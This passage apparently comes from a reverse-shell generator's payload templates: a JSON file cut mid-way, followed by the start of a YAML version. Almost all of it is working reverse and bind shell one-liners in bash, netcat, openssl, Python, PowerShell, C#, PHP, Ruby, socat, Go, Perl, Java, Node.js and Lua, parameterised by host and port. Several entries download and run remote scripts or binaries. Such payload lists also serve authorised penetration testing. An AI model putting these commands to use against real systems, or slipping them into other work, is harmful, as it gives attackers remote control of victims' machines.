{port}|{shell_path}|telnet {host} {port2}" 63 | }, 64 | "openssl-linux": { 65 | "openssl": "mkfifo /tmp/s;{shell_path} -i &1|{binary_name} s_client -quiet -connect {host}:{port}>/tmp/s;rm /tmp/s", 66 | "openssl-2": "mkfifo fifo; /bin/sh -i < fifo 2>&1 | openssl s_client -quiet -connect {host}:{port} > fifo; rm fifo" 67 | }, 68 | "python": { 69 | "python": "{binary_name} -c \"import socket,threading as t,subprocess as s;c=socket.socket();c.connect(('{host}',{port}));p=s.Popen('{shell_path}',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1);t.Thread(target=lambda:[p.stdin.flush() for _ in iter(int,1) if p.stdin.write(c.recv(1024).decode())],).start();t.Thread(target=lambda:[c.send(p.stdout.read(1).encode()) for _ in iter(int,1)],).start();p.wait()\"", 70 | "python-exec": "{binary_name} -c \"exec('import os,socket,threading as t,subprocess as s\\ndef i():\\n while 1:\\n try:\\n p.stdin.write(c.recv(1024).decode());p.stdin.flush()\\n except:\\n os._exit(0)\\ndef j():\\n while 1:\\n try:c.send(p.stdout.read(1).encode())\\n except:pass\\nc=socket.socket()\\np=s.Popen(\\'{shell_path}\\',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1)\\nfor _ in range(9):\\n try:\\n c.connect((\\'{host}\\',{port}));break\\n except:\\n pass\\nt.Thread(target=i,).start();t.Thread(target=j,).start()\\np.wait()')\"", 71 | "python-pty": "{binary_name} -c \"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('{host}',{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('{shell_path}')\"", 72 | "python-pty-short": "{binary_name} -c \"a=__import__;s=a('socket');o=a('os').dup2;p=a('pty').spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(('{host}',{port}));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p('{shell_path}')\"", 73 | "python-subprocess1": "{binary_name} -c \"socket=__import__('socket');subprocess=__import__('subprocess');os=__import__('os');s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('{host}',{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['{shell_path}','-i'])\"", 74 | "python-subprocess2": "{binary_name} -c \"a=__import__;b=a('socket').socket;p=a('subprocess').call;o=a('os').dup2;s=b();s.connect(('{host}',{port}));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(['{shell_path}','-i'])\"", 75 | "pwncat": "pwncat -e {shell_path} {host} {port} --reconn --reconn-wait 3{pwncat_args}" 76 | }, 77 | "python-windows": { 78 | "python": "{binary_name} -c \"import socket,threading as t,subprocess as s;c=socket.socket();c.connect(('{host}',{port}));p=s.Popen('{shell_path}',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1);t.Thread(target=lambda:[p.stdin.flush() for _ in iter(int,1) if p.stdin.write(c.recv(1024).decode())],).start();t.Thread(target=lambda:[c.send(p.stdout.read(1).encode()) for _ in iter(int,1)],).start();p.wait()\"", 79 | "python-exec": "{binary_name} -c \"exec('import os,socket,threading as t,subprocess as s\\ndef i():\\n while 1:\\n try:\\n p.stdin.write(c.recv(1024).decode());p.stdin.flush()\\n except:\\n os._exit(0)\\ndef j():\\n while 1:\\n try:c.send(p.stdout.read(1).encode())\\n except:pass\\nc=socket.socket()\\np=s.Popen(\\'{shell_path}\\',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1)\\nfor _ in range(9):\\n try:\\n c.connect((\\'{host}\\',{port}));break\\n except:\\n pass\\nt.Thread(target=i,).start();t.Thread(target=j,).start()\\np.wait()')\"", 80 | "pwncat": "pwncat -e {shell_path} {host} {port} --reconn --reconn-wait 3{pwncat_args}" 81 | }, 82 | "powershell": { 83 | "powershell-1": "{binary_name} /nop /c \"$client=New-Object System.Net.Sockets.TCPClient('{host}',{port});$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{{0}};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){{;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2= $sendback+'PS '+(pwd).Path+'>';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()\"", 84 | "powershell-2": "{binary_name} /nop /noni /ep bypass /c \"$TCPClient=New-Object Net.Sockets.TCPClient('{host}',{port});$NetworkStream=$TCPClient.GetStream();$StreamWriter=New-Object IO.StreamWriter($NetworkStream);function WriteToStream($String){{[byte[]]$script:Buffer=0..$TCPClient.ReceiveBufferSize|%{{0}};$StreamWriter.Write($String+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name+'>');$StreamWriter.Flush()}}WriteToStream'';while(($BytesRead=$NetworkStream.Read($Buffer,0,$Buffer.Length)) -gt 0){{$Command=([text.encoding]::UTF8).GetString($Buffer, 0,$BytesRead-1);$Output=try{{Invoke-Expression $Command 2>&1|Out-String}}catch{{$_|Out-String}}WriteToStream($Output)}}$StreamWriter.Close()\"", 85 | "powershell-ssl": "{binary_name} /nop /noni /ep bypass /c \"$TCPClient=New-Object Net.Sockets.TCPClient('{host}',{port});$NetworkStream=$TCPClient.GetStream();$SslStream=New-Object Net.Security.SslStream($NetworkStream,$false,({{$true}} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned){{$SslStream.Close();exit}}$StreamWriter=New-Object IO.StreamWriter($SslStream);function WriteToStream($String){{[byte[]]$script:Buffer=0..$TCPClient.ReceiveBufferSize|%{{0}};$StreamWriter.Write($String+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name+'>');$StreamWriter.Flush()}};WriteToStream'';while(($BytesRead=$SslStream.Read($Buffer,0,$Buffer.Length)) -gt 0){{$Command=([text.encoding]::UTF8).GetString($Buffer,0,$BytesRead-1);$Output=try{{Invoke-Expression $Command 2>&1|Out-String}}catch{{$_|Out-String}}WriteToStream($Output)}}$StreamWriter.Close()\"", 86 | "powershell-ConPty": "{binary_name} \"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing);Invoke-ConPtyShell {host} {port}\"", 87 | "powercat-Github-1": "{binary_name} \"IEX(IWR https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1);powercat -c {host} -p {port} -e {shell_path}\"", 88 | "powercat-Github-2": "{binary_name} \"IEX(curl https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1);powercat -c {host} -p {port} -e {shell_path}\"", 89 | "powercat-Github-3": "{binary_name} \"IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c {host} -p {port} -e {shell_path}\"" 90 | }, 91 | "csharp": { 92 | "csharp-csc": "echo using System;using System.IO;using System.Net;using System.Net.Sockets;using System.Text;using System.Diagnostics;public class i{{public static TcpClient c;public static NetworkStream s;public static StreamReader r;public static StreamWriter w;public static StringBuilder u;public static void Main(){{c=new TcpClient();u=new StringBuilder();if(!c.Connected){{try{{c.Connect(\"{host}\",{port});s=c.GetStream();r=new StreamReader(s,System.Text.Encoding.Default);w=new StreamWriter(s,System.Text.Encoding.Default);}}catch(Exception){{return;}}Process h;h=new Process();h.StartInfo.FileName=\"{shell_path}\";h.StartInfo.UseShellExecute=false;h.StartInfo.RedirectStandardInput=true;h.StartInfo.RedirectStandardOutput=true;h.StartInfo.RedirectStandardError=true;h.OutputDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.ErrorDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.Start();h.BeginOutputReadLine();h.BeginErrorReadLine();while(true){{try{{u.Append(r.ReadLine());h.StandardInput.WriteLine(u);u.Remove(0,u.Length);}}catch(Exception){{r.Close();w.Close();h.Kill();break;}}}}}}}}public static void SortOutputHandler(object sendingProcess,DataReceivedEventArgs outLine){{StringBuilder strOutput=new StringBuilder();if(!String.IsNullOrEmpty(outLine.Data)){{try{{strOutput.Append(outLine.Data);w.WriteLine(strOutput);w.Flush();}}catch(Exception){{}}}}}}}}>%tmp%\\0&&for,/f,%p,in,('where,/r,%systemroot%\\Microsoft.NET\\Framework,csc.exe'),do,%p /out:%tmp%\\0.exe %tmp%\\0&&%tmp%\\0.exe&&del,/q %tmp%\\0.exe %tmp%\\0", 93 | "csharp-powershell-code": "$j=get-random;$d=@\"\nusing System;using System.IO;using System.Net;using System.Net.Sockets;using System.Text;using System.Diagnostics;public class i$j{{public static TcpClient c;public static NetworkStream s;public static StreamReader r;public static StreamWriter w;public static StringBuilder u;public static void Main(){{c=new TcpClient();u=new StringBuilder();if(!c.Connected){{try{{c.Connect(\"{host}\",{port});s=c.GetStream();r=new StreamReader(s,System.Text.Encoding.Default);w=new StreamWriter(s,System.Text.Encoding.Default);}}catch(Exception){{return;}}Process h;h=new Process();h.StartInfo.FileName=\"{shell_path}\";h.StartInfo.UseShellExecute=false;h.StartInfo.RedirectStandardInput=true;h.StartInfo.RedirectStandardOutput=true;h.StartInfo.RedirectStandardError=true;h.OutputDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.ErrorDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.Start();h.BeginOutputReadLine();h.BeginErrorReadLine();while(true){{try{{u.Append(r.ReadLine());h.StandardInput.WriteLine(u);u.Remove(0,u.Length);}}catch(Exception){{r.Close();w.Close();h.Kill();break;}}}}}}}}public static void SortOutputHandler(object sendingProcess,DataReceivedEventArgs outLine){{StringBuilder strOutput=new StringBuilder();if(!String.IsNullOrEmpty(outLine.Data)){{try{{strOutput.Append(outLine.Data);w.WriteLine(strOutput);w.Flush();}}catch(Exception){{}}}}}}}}\n\"@;Add-Type -TypeDefinition $d -Language CSharp;iex \"[i$j]::Main()\"" 94 | }, 95 | "php": { 96 | "php-exec": "{binary_name} -r \"$sock=fsockopen('{host}',{port});exec('{shell_path} <&3 >&3 2>&3');\"", 97 | "php-shell_exec": "{binary_name} -r \"$sock=fsockopen('{host}',{port});shell_exec('{shell_path} <&3 >&3 2>&3');\"", 98 | "php-system": "{binary_name} -r \"$sock=fsockopen('{host}',{port});system('{shell_path} -i <&3 >&3 2>&3');\"", 99 | "php-passthru": "{binary_name} -r \"$sock=fsockopen('{host}',{port});passthru('{shell_path} -i <&3 >&3 2>&3');\"", 100 | "php-popen": "{binary_name} -r \"$sock=fsockopen('{host}',{port});popen('{shell_path} -i <&3 >&3 2>&3\",'r');\"", 101 | "php-proc_open": "{binary_name} -r \"$sock=fsockopen('{host}',{port});$proc=proc_open('{shell_path}',array(0=>$sock,1=>$sock,2=>$sock),$pipes);\"", 102 | "php-backtick": "{binary_name} -r \"$sock=fsockopen('{host}',{port});`{shell_path} <&3 >&3 2>&3`;\"", 103 | "php-code": "array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));private $buffer=1024;private $clen=0;private $error=false;public function __construct($addr,$port){{$this->addr=$addr;$this->port=$port;}}private function detect(){{$detected=true;if(stripos(PHP_OS,'LINUX')!==false){{$this->os='LINUX';$this->s='/bin/sh';}}else if(stripos(PHP_OS,'WIN32')!==false||stripos(PHP_OS,'WINNT')!==false||stripos(PHP_OS,'WINDOWS')!==false){{$this->os='WINDOWS';$this->s='cmd.exe';}}else{{$detected=false;}}return $detected;}}private function daemonize(){{$exit=false;if(!function_exists('pcntl_fork')){{}}else if(($pid=@pcntl_fork())<0){{}}else if($pid>0){{$exit=true;}}else if(posix_setsid()<0){{}}else{{}}return $exit;}}private function settings(){{@error_reporting(0);@set_time_limit(0);@umask(0);}}private function dump($data){{$data=str_replace('<','<',$data);$data=str_replace('>','>',$data);}}private function read($stream,$name,$buffer){{if(($data=@fread($stream,$buffer))===false){{$this->error=true;}}return $data;}}private function write($stream,$name,$data){{if(($bytes=@fwrite($stream,$data))===false){{$this->error=true;}}return $bytes;}}private function rw($input,$output,$iname,$oname){{while(($data=$this->read($input,$iname,$this->buffer))&&$this->write($output,$oname,$data)){{if($this->os==='WINDOWS'&&$oname==='STDIN'){{$this->clen+=strlen($data);}}$this->dump($data);}}}}private function brw($input,$output,$iname,$oname){{$fstat=fstat($input);$size=$fstat['size'];if($this->os==='WINDOWS'&&$iname==='STDOUT'&&$this->clen){{while($this->clen>0&&($bytes=$this->clen>=$this->buffer?$this->buffer:$this->clen)&&$this->read($input,$iname,$bytes)){{$this->clen-=$bytes;$size-=$bytes;}}}}while($size>0&&($bytes=$size>=$this->buffer?$this->buffer:$size)&&($data=$this->read($input,$iname,$bytes))&&$this->write($output,$oname,$data)){{$size-=$bytes;$this->dump($data);}}}}public function run(){{if($this->detect()&&!$this->daemonize()){{$this->settings();$socket=@fsockopen($this->addr,$this->port,$errno,$errstr,30);if(!$socket){{echo\"{{$errno}}: {{$errstr}}\";}}else{{stream_set_blocking($socket,false);$process=@proc_open($this->s,$this->descriptorspec,$pipes,null,null);if(!$process){{}}else{{foreach($pipes as $pipe){{stream_set_blocking($pipe,false);}}$status=proc_get_status($process);@fwrite($socket,\"PID:{{$status['pid']}}\");do{{$status=proc_get_status($process);if(feof($socket)){{break;}}else if(feof($pipes[1])||!$status['running']){{break;}}$streams=array('read'=>array($socket,$pipes[1],$pipes[2]),'write'=>null,'except'=>null);$num_changed_streams=@stream_select($streams['read'],$streams['write'],$streams['except'],0);if($num_changed_streams===false){{break;}}else if($num_changed_streams>0){{if($this->os==='LINUX'){{if(in_array($socket,$streams['read'])){{$this->rw($socket,$pipes[0],'SOCKET','STDIN');}}if(in_array($pipes[2],$streams['read'])){{$this->rw($pipes[2],$socket,'STDERR','SOCKET');}}if(in_array($pipes[1],$streams['read'])){{$this->rw($pipes[1],$socket,'STDOUT','SOCKET');}}}}else if($this->os==='WINDOWS'){{if(in_array($socket,$streams['read'])){{$this->rw($socket,$pipes[0],'SOCKET','STDIN');}}if(($fstat=fstat($pipes[2]))&&$fstat['size']){{$this->brw($pipes[2],$socket,'STDERR','SOCKET');}}if(($fstat=fstat($pipes[1]))&&$fstat['size']){{$this->brw($pipes[1],$socket,'STDOUT','SOCKET');}}}}}}}}while(!$this->error);foreach($pipes as $pipe){{fclose($pipe);}}proc_close($process);}}fclose($socket);}}}}}}}}$sh=new S('{host}',{port});$sh->run();unset($sh);?>" 104 | }, 105 | "php-windows": { 106 | "php": "echo \"array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));private $buffer=1024;private $clen=0;private $error=false;public function __construct($addr,$port){{$this->addr=$addr;$this->port=$port;}}private function detect(){{$detected=true;if(stripos(PHP_OS,'LINUX')!==false){{$this->os='LINUX';$this->s='/bin/sh';}}else if(stripos(PHP_OS,'WIN32')!==false||stripos(PHP_OS,'WINNT')!==false||stripos(PHP_OS,'WINDOWS')!==false){{$this->os='WINDOWS';$this->s='cmd.exe';}}else{{$detected=false;}}return $detected;}}private function daemonize(){{$exit=false;if(!function_exists('pcntl_fork')){{}}else if(($pid=@pcntl_fork())<0){{}}else if($pid>0){{$exit=true;}}else if(posix_setsid()<0){{}}else{{}}return $exit;}}private function settings(){{@error_reporting(0);@set_time_limit(0);@umask(0);}}private function dump($data){{$data=str_replace('<','<',$data);$data=str_replace('>','>',$data);}}private function read($stream,$name,$buffer){{if(($data=@fread($stream,$buffer))===false){{$this->error=true;}}return $data;}}private function write($stream,$name,$data){{if(($bytes=@fwrite($stream,$data))===false){{$this->error=true;}}return $bytes;}}private function rw($input,$output,$iname,$oname){{while(($data=$this->read($input,$iname,$this->buffer))&&$this->write($output,$oname,$data)){{if($this->os==='WINDOWS'&&$oname==='STDIN'){{$this->clen+=strlen($data);}}$this->dump($data);}}}}private function brw($input,$output,$iname,$oname){{$fstat=fstat($input);$size=$fstat['size'];if($this->os==='WINDOWS'&&$iname==='STDOUT'&&$this->clen){{while($this->clen>0&&($bytes=$this->clen>=$this->buffer?$this->buffer:$this->clen)&&$this->read($input,$iname,$bytes)){{$this->clen-=$bytes;$size-=$bytes;}}}}while($size>0&&($bytes=$size>=$this->buffer?$this->buffer:$size)&&($data=$this->read($input,$iname,$bytes))&&$this->write($output,$oname,$data)){{$size-=$bytes;$this->dump($data);}}}}public function run(){{if($this->detect()&&!$this->daemonize()){{$this->settings();$socket=@fsockopen($this->addr,$this->port,$errno,$errstr,30);if(!$socket){{echo\"{{$errno}}: {{$errstr}}\";}}else{{stream_set_blocking($socket,false);$process=@proc_open($this->s,$this->descriptorspec,$pipes,null,null);if(!$process){{}}else{{foreach($pipes as $pipe){{stream_set_blocking($pipe,false);}}$status=proc_get_status($process);@fwrite($socket,\"PID:{{$status['pid']}}\");do{{$status=proc_get_status($process);if(feof($socket)){{break;}}else if(feof($pipes[1])||!$status['running']){{break;}}$streams=array('read'=>array($socket,$pipes[1],$pipes[2]),'write'=>null,'except'=>null);$num_changed_streams=@stream_select($streams['read'],$streams['write'],$streams['except'],0);if($num_changed_streams===false){{break;}}else if($num_changed_streams>0){{if($this->os==='LINUX'){{if(in_array($socket,$streams['read'])){{$this->rw($socket,$pipes[0],'SOCKET','STDIN');}}if(in_array($pipes[2],$streams['read'])){{$this->rw($pipes[2],$socket,'STDERR','SOCKET');}}if(in_array($pipes[1],$streams['read'])){{$this->rw($pipes[1],$socket,'STDOUT','SOCKET');}}}}else if($this->os==='WINDOWS'){{if(in_array($socket,$streams['read'])){{$this->rw($socket,$pipes[0],'SOCKET','STDIN');}}if(($fstat=fstat($pipes[2]))&&$fstat['size']){{$this->brw($pipes[2],$socket,'STDERR','SOCKET');}}if(($fstat=fstat($pipes[1]))&&$fstat['size']){{$this->brw($pipes[1],$socket,'STDOUT','SOCKET');}}}}}}}}while(!$this->error);foreach($pipes as $pipe){{fclose($pipe);}}proc_close($process);}}fclose($socket);}}}}}}}}$sh=new S('{host}',{port});$sh->run();unset($sh);?>\"|{binary_name}" 107 | }, 108 | "ruby-linux": { 109 | "ruby-spawn": "{binary_name} -rsocket -e\"spawn('{shell_path}',[:in,:out,:err]=>TCPSocket.new('{host}',{port}))\"", 110 | "ruby-sprintf": "{binary_name} -rsocket -e\"f=TCPSocket.open('{host}',{port}).to_i;exec sprintf('{shell_path} -i <&%d >&%d 2>&%d',f,f,f)\"", 111 | "ruby-new": "{binary_name} -rsocket -e \"exit if fork;c=TCPSocket.new('{host}',{port});loop{{c.gets.chomp!;(exit! if $_=='exit');($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){{|io|c.print io.read}}))rescue c.puts 'failed: #{{$_}}'}}\"", 112 | "ruby-windows": "{binary_name} -rsocket -e \"c=TCPSocket.new('{host}','{port}');while(cmd=c.gets);IO.popen({shell_path},'r'){{|io|c.print io.read}}end\"" 113 | }, 114 | "socat": { 115 | "socat": "{binary_name} {protocol}:{host}:{port} EXEC:{shell_path}{socat_args}", 116 | "socat-tty": "{binary_name} {protocol}:{host}:{port} EXEC:'{shell_path}',pty,stderr,setsid,sigint,sane", 117 | "socat-linux": "wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat;chmod +x /tmp/socat;/tmp/socat exec:'{shell_path} -li',pty,stderr,setsid,sigint,sane {protocol}:{host}:{port}" 118 | }, 119 | "golang-linux": { 120 | "golang": "echo 'package main;import\"os/exec\";import\"net\";func main(){{c,_:=net.Dial(\"tcp\",\"{host}:{port}\");cmd:=exec.Command(\"{shell_path}\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}}'>/tmp/t.go &&{binary_name} run /tmp/t.go&&rm /tmp/t.go" 121 | }, 122 | "golang-windows": { 123 | "golang": "echo package main;import\"os/exec\";import\"net\";func main(){{c,_:=net.Dial(\"tcp\",\"{host}:{port}\");cmd:=exec.Command(\"{shell_path}\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}}>%tmp%\\0.go&{binary_name} run %tmp%\\0.go&del %tmp%\\0.go %tmp%\\0" 124 | }, 125 | "perl-linux": { 126 | "perl": "{binary_name} -e 'use Socket;$i=\"{host}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"{protocol}\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"{shell_path} -i\");}};'", 127 | "perl-2": "{binary_name} -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{host}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" 128 | }, 129 | "perl-windows": { 130 | "perl": "{binary_name} -e \"use Socket;$i='{host}';$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname('{protocol}'));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('{shell_path}');}};\"", 131 | "perl-2": "{binary_name} -MIO -e \"$c=new IO::Socket::INET(PeerAddr,'{host}:{port}');STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\"" 132 | }, 133 | "java": { 134 | "java-jar": "{binary_name} -jar Reverse_Shell.jar {host} {port}", 135 | "java-jar-github": "wget -q https://raw.githubusercontent.com/ivan-sincek/java-reverse-tcp/main/jar/Reverse_Shell.jar -O 0&&java -jar 0 {host} {port}&&del 0||rm 0", 136 | "java-jar3": "{binary_name} -jar JavaStager-0.1-initial.jar http://attackerip/payload.java", 137 | "java-jsp": "https://github.com/tennc/webshell/blob/master/jsp/jsp-reverse.jsp", 138 | "java-jsp2": "https://github.com/ivan-sincek/java-reverse-tcp/blob/main/jsp/reverse/jsp_reverse_shell.jsp", 139 | "java-jsp-msfvenom": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={host} LPORT={port} -f raw>reverse.jsp", 140 | "java-war-msfvenom": "msfvenom -p java/jsp_shell_reverse_tcp LHOST={host} LPORT={port} -f war>reverse.war" 141 | }, 142 | "nodejs-linux": { 143 | "nodejs-async": "echo 'require(\"child_process\").exec(\"{shell_path} -i >& /dev/tcp/{host}/{port} 0>&1\")'|{binary_name}", 144 | "nodejs-sync": "echo 'require(\"child_process\").execSync(\"{shell_path} -i >& /dev/tcp/{host}/{port} 0>&1\")'|{binary_name}", 145 | "nodejs-spawn": "echo '!function(){{var e=require(\"net\"),n=require(\"child_process\"),r=n.spawn(\"{shell_path}\",[]),t=new e.Socket;return t.connect({port},\"{host}\",function(){{t.pipe(r.stdin),r.stdout.pipe(t),r.stderr.pipe(t)}}),/a/}}();'|{binary_name}" 146 | }, 147 | "nodejs-windows": { 148 | "nodejs-async": "echo require('child_process').exec('nc -e {shell_path} {host} {port}')|{binary_name}", 149 | "nodejs-sync": "echo require('child_process').execSync('nc -e {shell_path} {host} {port}')|{binary_name}", 150 | "nodejs-spawn": "echo !function(){{var e=require(\"net\"),n=require(\"child_process\"),r=n.spawn(\"{shell_path}\",[]),t=new e.Socket;return t.connect({port},\"{host}\",function(){{t.pipe(r.stdin),r.stdout.pipe(t),r.stderr.pipe(t)}}),/a/}}();|{binary_name}" 151 | }, 152 | "lua": { 153 | "lua5.1": "lua5.1 -e 'local host, port = \"{host}\", {port} local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \"r\") local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'", 154 | "lua-linux": "{binary_name} -e \"require('socket');require('os');t=socket.tcp();t:connect('{host}','{port}');os.execute('{shell_path} -i <&3 >&3 2>&3');\"" 155 | }, 156 | "custom_payload_type": { 157 | "custom_payload_name": "custom_payload_value" 158 | } 159 | }, 160 | "bind": { 161 | "bash": { 162 | "bash-bind": "rm -f /tmp/m;mkfifo /tmp/m;cat /tmp/m|{shell_path} -i 2>&1|nc -l {port} >/tmp/m" 163 | }, 164 | "netcat": { 165 | "nc": "rm -f /tmp/m;mkfifo /tmp/m;cat /tmp/m|{shell_path} -i 2>&1|nc -l {port} >/tmp/m", 166 | "nc-e": "{binary_name} -Lnp {port} -e {shell_path}{nc_args}", 167 | "ncat-e": "ncat -lnp {port} -e {shell_path}{ncat_args}", 168 | "ncat-ssl": "ncat -lnp {port} -e {shell_path} --ssl", 169 | "DotnetCat": "dncat -lp {port} -e {shell_path}" 170 | }, 171 | "socat": { 172 | "socat": "{binary_name} -d -d {protocol}4-LISTEN:{port} EXEC:'{shell_path}'{socat_args}", 173 | "socat-ssl": "{binary_name} OPENSSL-LISTEN:{port},cert=bind.pem,verify=0,fork EXEC:'{shell_path}'{socat_args}" 174 | }, 175 | "python": { 176 | "python-bind": "{binary_name} -c \"import subprocess as u;c=__import__('socket').socket();c.bind(('{host}',{port}));c.listen(0);cc,a=c.accept();p=u.Popen(['{shell_path}'],stdin=u.PIPE,stdout=u.PIPE,stderr=u.STDOUT);r=__import__('threading').Thread(target=lambda:[cc.send(p.stdout.read(1024)) for _ in iter(int,1)],);r.start();[p.stdin.flush() for _ in iter(int, 1) if p.stdin.write(cc.recv(1024))]\"", 177 | "pwncat": "pwncat -l {host} {port} -e {shell_path}{pwncat_args}" 178 | }, 179 | "perl-linux": { 180 | "perl-bind": "{binary_name} -e 'use Socket;$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"{protocol}\"));bind(S,sockaddr_in($p,INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){{open(STDIN,\">&C\");open(STDOUT,\">&C\");open(STDERR,\">&C\");exec(\"{shell_path} -i\");}};'" 181 | }, 182 | "perl-windows": { 183 | "perl-bind": "{binary_name} -e \"use Socket;$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname('{protocol}'));bind(S,sockaddr_in($p,INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){{open(STDIN,'>&C');open(STDOUT,'>&C');open(STDERR,'>&C');exec('{shell_path}');}};\"" 184 | }, 185 | "golang": { 186 | "gotty-webshell": "gotty {gotty_args}-w --reconnect {shell_path}" 187 | }, 188 | "custom_payload_type": { 189 | "custom_payload_name": "custom_payload_value" 190 | } 191 | } 192 | } -------------------------------------------------------------------------------- /payloads_template.yml: -------------------------------------------------------------------------------- 1 | --- 2 | reverse: 3 | bash: 4 | Bash-i: "{shell_path} -i >& /dev/{protocol}/{host}/{port} 0>&1" 5 | Bash-l: "{shell_path} -l >& /dev/{protocol}/{host}/{port} 0>&1" 6 | Bash-p: "{shell_path} -p >& /dev/{protocol}/{host}/{port} 0>&1" 7 | Bash-c: "{shell_path} -c '{shell_path} -l >& /dev/{protocol}/{host}/{port} 0>&1'" 8 | Bash196: 0<&196;exec 196<>/dev/{protocol}/{host}/{port}; sh <&196 >&196 2>&196 9 | Bash-readline: exec 5<>/dev/{protocol}/{host}/{port}; while read line 0<&5; do 10 | $line 2>&5 >&5; done 11 | Bash5: "{shell_path} -i 5<> /dev/{protocol}/{host}/{port} 0<&5 1>&5 2>&5" 12 | zsh: zsh -c 'zmodload zsh/net/tcp && ztcp {host} {port} && zsh >&$REPLY 2>&$REPLY 13 | 0>&$REPLY' 14 | bash-password: 15 | Bash-i: "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} 16 | -i;esac' >& /dev/{protocol}/{host}/{port} 0>&1" 17 | Bash-l: "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} 18 | -l;esac' >& /dev/{protocol}/{host}/{port} 0>&1" 19 | Bash-p: "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} 20 | -p;esac' >& /dev/{protocol}/{host}/{port} 0>&1" 21 | bash-ssl: 22 | Bash-i: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -i 2>&1|openssl s_client 23 | -quiet -connect {host}:{port} >/tmp/f 24 | Bash-l: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -l 2>&1|openssl s_client 25 | -quiet -connect {host}:{port} >/tmp/f 26 | Bash-p: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -p 2>&1|openssl s_client 27 | -quiet -connect {host}:{port} >/tmp/f 28 | bash-ssl-password: 29 | Bash-i: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read 30 | k;case $k in '{password}'){shell_path} -i;esac' 2>&1|openssl s_client -quiet 31 | -connect {host}:{port} >/tmp/f 32 | Bash-l: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read 33 | k;case $k in '{password}'){shell_path} -l;esac' 2>&1|openssl s_client -quiet 34 | -connect {host}:{port} >/tmp/f 35 | Bash-p: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read 36 | k;case $k in '{password}'){shell_path} -p;esac' 2>&1|openssl s_client -quiet 37 | -connect {host}:{port} >/tmp/f 38 | netcat: 39 | nc: "{binary_name} -e {shell_path} {host} {port}{nc_args}" 40 | nc-c: "{binary_name} {host} {port} -c {shell_path}{nc_args}" 41 | ncat: ncat -e {shell_path} {host} {port}{ncat_args} 42 | ncat-c: ncat -c {shell_path} {host} {port}{ncat_args} 43 | nc-mkfifo: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -i 2>&1|{binary_name} 